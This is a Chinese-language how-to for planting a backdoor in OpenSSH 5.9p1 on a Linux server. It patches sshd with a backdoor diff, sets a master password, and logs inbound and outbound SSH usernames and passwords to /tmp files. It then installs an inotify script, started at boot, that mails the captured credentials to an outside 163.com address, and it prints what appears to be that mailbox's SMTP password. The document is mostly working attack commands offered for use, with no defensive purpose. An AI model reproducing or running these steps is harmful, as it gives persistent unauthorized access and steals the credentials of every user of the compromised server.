软件包
- 0x06-openssh-5.9p1.patch.tar.gz
- openssh-5.9p1.tar.gz
- inotify-tools-3.13.tar.gz
1、安装 gcc
[root@ localhost ~]# yum -y install epel-release
[root@ localhost ~]# yum -y install gcc
2、安装 0x06-openssh 和 openssh
[root@ localhost ~]# tar -xvzf openssh-5.9p1.tar.gz
[root@ localhost ~]# tar -xvzf 0x06-openssh-5.9p1.patch.tar.gz
3、打补丁
[root@ localhost ~]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
[root@ localhost openssh-5.9p1]# patch < sshbd5.9p1.diff
[root@ localhost ~]# vim openssh-5.9p1/includes.h
177 #define ILOG "/tmp/ilog" #记录登录到本机的用户名和密码
178 #define OLOG "/tmp/olog" #记录从本机登录到其他服务器上的用户名和密码
179 #define SECRETPW "123" #你后门密码
4、安装打了后门补丁的sshd服务
[root@ localhost ~]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel
[root@ localhost openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
[root@ localhost openssh-5.9p1]# make -j 4 && make install^C
5、将用户名和密码发送到邮箱
[root@ localhost ~]# vim /etc/mail.rc
set from=yzy2284356425@163.com smtp=smtp.163.com
set smtp-auth-user=yzy2284356425 smtp-auth-password=yzy8800 smtp-auth=login
[root@ localhost ~]# mail -s "demo title" yzy2284356425@163.com < /tmp/ilog
set from=邮箱
set smtp-auth-user=收件人姓名
smtp-auth-password=邮箱授权码
6、shell脚本+inotify自动发送邮件
安装 inotify
[root@ localhost ~]# tar -xvzf inotify-tools-3.13.tar.gz
[root@ localhost ~]# cd inotify-tools-3.13
[root@ localhost ~]# ./configure
[root@ localhost ~]# make -j 4 && make install
编写脚本
[root@ localhost ~]# vim /bin/zipmail
#!/bin/bash
/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /tmp/ilog | while read a b c
do
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
mail -s $ip yzy2284356425@163.com < /tmp/ilog
done
设置 zipmail脚本开机自启
[root@ localhost ~]# vim /etc/rc.local
/bin/zipmail &